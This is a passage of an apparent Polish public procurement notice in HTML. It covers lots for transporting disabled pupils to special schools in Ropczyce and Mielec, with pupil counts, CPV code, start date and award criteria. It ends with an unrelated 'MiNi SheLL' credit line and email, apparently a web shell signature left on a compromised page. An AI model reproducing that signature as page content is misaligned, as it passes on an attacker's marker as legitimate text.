<li>2. Czas podstawienia pojazdu zastępczego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CZĘŚĆ II  Dowóz / przywóz  uczniów niepełnosprawnych  do / z  Specjalnego  Ośrodka  Szkolno - Wychowawczego w Ropczycach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dotyczy 7 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas podstawienia pojazdu zastępczego - 2</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> CZĘŚĆ III Dowóz / przywóz uczniów niepełnosprawnych  do / z Ośrodka  Rehabilitacyjno - Edukacyjno - Wychowawczego  w Mielcu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dotyczy 2 uczniów, w tym 2 osoby na wózkach inwalidzkich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 98</li>
<li>2. Czas podstawienia pojazdu zastępczego - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com